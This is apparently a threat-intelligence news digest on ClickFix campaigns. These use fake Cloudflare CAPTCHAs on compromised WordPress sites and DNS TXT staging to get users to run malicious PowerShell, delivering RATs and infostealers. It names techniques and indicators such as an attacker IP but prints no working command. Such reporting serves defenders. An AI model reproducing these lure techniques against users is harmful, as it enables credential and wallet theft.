ClickFix Social-Engineering Campaigns Using Compromised WordPress Sites and DNS-Based Staging
Threat actors are scaling ClickFix-style “self-infection” attacks that abuse compromised legitimate websites to trick users into manually executing malicious PowerShell via the Windows Run dialog or a terminal. Reporting describes the KongTuke campaign evolving its tradecraft by retrieving next-stage instructions from DNS TXT records rather than over HTTP, reducing visibility for controls focused on web traffic and blending activity into normal DNS resolution. The objective is follow-on malware deployment and persistence, including installation of remote-access tooling such as the Interlock RAT.
Separately, researchers described a large watering-hole operation dubbed IClickFix that poisoned 3,800+ WordPress sites with a fake Cloudflare Turnstile CAPTCHA prompt that instructs visitors to copy/paste and run a “fix” command. Once executed, the staged PowerShell pulls commodity payloads including NetSupport RAT, Emmenhtal Loader, and XFiles Stealer, and uses tracking/targeting logic (e.g., an ic-tracker-js HTML tag) to manage victim flow. In contrast, a different WordPress compromise technique called “directory shadowing” was reported as an SEO-spam operation that creates physical folders matching WordPress permalinks and serves gambling content selectively to crawlers (via User-Agent checks), which is not part of the ClickFix execution chain.
Sources
Related Stories
ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites
Threat researchers reported continued evolution and operationalization of **ClickFix**-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed **CrashFix**, attributed to **KongTuke**, which uses a **malicious browser extension** to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a **PowerShell** command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution. Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate **WordPress** sites to inject a ClickFix implant that impersonates a **Cloudflare human verification (CAPTCHA)** challenge. The operation has affected **250+** infected sites across **12+ countries** and delivers a **multi-stage, mostly in-memory** malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing **credentials and digital wallets** from Windows systems, enabling downstream financial theft and potential follow-on intrusion using harvested credentials.
1 weeks ago
ClickFix Campaign Hijacks WordPress Sites to Deliver Infostealers via Fake Cloudflare CAPTCHA
Threat actors covertly compromised **250+ legitimate WordPress websites**—including small businesses, regional media outlets, and at least one **U.S. Senate candidate** campaign site—and used them as distribution points for an **infostealer** operation. Rapid7 reported that attackers injected malicious code into the compromised sites to display a convincing **fake Cloudflare CAPTCHA** page that instructs visitors to **copy and execute a command** on their own machines, leveraging the **ClickFix** social-engineering technique to initiate malware delivery. Once executed, the malicious command leads to installation of credential-stealing malware capable of exfiltrating **browser-stored credentials**, **authentication cookies**, and **cryptocurrency wallet data**, with stolen “logs” potentially monetized on cybercrime forums. Reporting indicates the campaign has been active since **December** and shows signs of **high automation** across unrelated WordPress instances; Rapid7 also noted attacker-controlled domains used in the operation were registered around **July–August**, and the firm said it **notified U.S. authorities** to support investigation and remediation.
5 days ago
ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A **ClickFix**-style malware campaign has been observed using **fake CAPTCHA** pages on compromised websites to trick users into **manually executing** malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a **PowerShell** command and run it themselves; the script then downloads additional stages from attacker infrastructure (including `91.92.240.219`), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an **information stealer** targeting data from **25+ web browsers**, cryptocurrency wallets (e.g., *MetaMask*), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration. Separately reported threat activity in the same time window includes **UnsolicitedBooker** targeting Central Asian telecoms with phishing-delivered backdoors (**LuciDoor** and **MarsSnake**) and **APT28** running *Operation MacroMaze*, which uses weaponized Office documents and `INCLUDEPICTURE` fields pointing to `webhook[.]site` URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses `nslookup` and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
3 weeks ago